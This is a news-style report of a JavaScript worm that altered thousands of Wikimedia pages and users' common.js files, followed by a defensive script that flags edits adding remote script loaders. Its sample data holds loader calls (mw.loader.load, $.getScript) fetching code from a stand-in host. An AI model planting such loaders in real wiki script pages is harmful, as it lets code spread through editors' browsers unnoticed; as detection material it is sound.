Self-propagating JavaScript worm vandalizes Meta-Wiki pages

On March 5, 2026, a Wikimedia Foundation Phabricator issue said engineers had temporarily restricted editing after a self-propagating JavaScript worm modified about 3,996 pages and replaced roughly 85 users’ common.js scripts across wiki projects.

KEY FACTS

  • Incident: Self-propagating JavaScript injected into global and user common.js files
  • Scope: About 3,996 pages modified and around 85 users had common.js replaced
  • Origin: Malicious test.js was hosted on Russian Wikipedia
  • Response: Editing was temporarily restricted and injected code was removed

The malicious file was stored on a user page on Russian Wikipedia. An archived test script shows the code attempted to overwrite User:<username>/common.js and MediaWiki:Common.js so that the loader would run in editors’ browsers.

The loader attempted site-level persistence by editing MediaWiki:Common.js when the executing account had the privileges to do so. It also modified individual users’ common.js files so that they loaded the payload automatically.

The worm also edited random pages by using the Special:Random command, inserting an image and a hidden JavaScript loader that fetched an external payload.

BleepingComputer’s review counted about 3,996 modified pages and roughly 85 users with replaced common.js files. Engineers rolled back affected scripts, suppressed the modified pages in histories, and removed the injected code, so editing is possible again.
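A defender reviewing edit records can triage them for the pattern described above: script pages that gain a loader pointing at another host, and one account adding loaders to many content pages. This is an added example, not code from Wikimedia or from the worm; the record shape, the hosts `wiki.example` and `other.example`, and every sample edit are constructed, and the content-page text is a stand-in because the article does not show the worm's markup.

```javascript
// Added example: triage wiki edit records for the loader behaviour described above.
// Record shape {title, user, text}, host names and all sample data are constructed.
const SITE_JS = /^MediaWiki:Common\.js$/i;
const USER_JS = /^User:[^/]+\/common\.js$/i;
// MediaWiki/jQuery script-loading calls; the first string argument is the target.
const LOADER = /(?:mw\.loader\.load|importScript|\$\.getScript)\s*\(\s*['"]([^'"]+)['"]/g;

// Return loader targets that name a host other than the local wiki.
function remoteTargets(text, localHost) {
  return [...text.matchAll(LOADER)]
    .map(m => m[1])
    .filter(t => {
      const host = /^(?:https?:)?\/\/([^/]+)/i.exec(t);
      return host !== null && host[1].toLowerCase() !== localHost.toLowerCase();
    });
}

function triage(edits, localHost, burstThreshold = 3) {
  const findings = [];
  const pagesByUser = new Map(); // user -> Set of content pages given a remote loader
  for (const { title, user, text } of edits) {
    const remote = remoteTargets(text, localHost);
    if (remote.length === 0) continue; // local or no script loading: not flagged
    if (SITE_JS.test(title)) {
      findings.push({ kind: 'site-js', title, user, remote });
    } else if (USER_JS.test(title)) {
      findings.push({ kind: 'user-js', title, user, remote });
    } else {
      if (!pagesByUser.has(user)) pagesByUser.set(user, new Set());
      pagesByUser.get(user).add(title);
    }
  }
  for (const [user, pages] of pagesByUser) {
    if (pages.size >= burstThreshold) findings.push({ kind: 'content-burst', user, count: pages.size });
  }
  return findings;
}

// Constructed sample: wiki.example is the local wiki, other.example a different host.
const SAMPLE = [
  { title: 'MediaWiki:Common.js', user: 'AdminA', text: "mw.loader.load('//other.example/w/index.php?title=User:X/demo.js&action=raw');" },
  { title: 'User:EditorB/common.js', user: 'EditorB', text: 'importScript("User:EditorB/tools.js");' },
  { title: 'User:EditorC/common.js', user: 'EditorC', text: "$.getScript('https://other.example/p.js');" },
  { title: 'Page one', user: 'EditorC', text: "[[File:Img.png]] mw.loader.load('//other.example/p.js')" },
  { title: 'Page two', user: 'EditorC', text: "[[File:Img.png]] mw.loader.load('//other.example/p.js')" },
  { title: 'Page three', user: 'EditorC', text: "[[File:Img.png]] mw.loader.load('//other.example/p.js')" },
  { title: 'Page four', user: 'EditorD', text: 'Plain prose edit.' },
];
console.log(triage(SAMPLE, 'wiki.example'));
```

EditorB's script loads only a local page and is not flagged; matching is textual, so it is a review aid for rollback candidates rather than a complete filter.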

WHY IT MATTERS

Global and user JavaScript run in editors’ browsers, so a malicious or dormant script can spread rapidly and alter content at scale. The incident highlights the risks of executing user-authored code and the need to limit and review such execution carefully.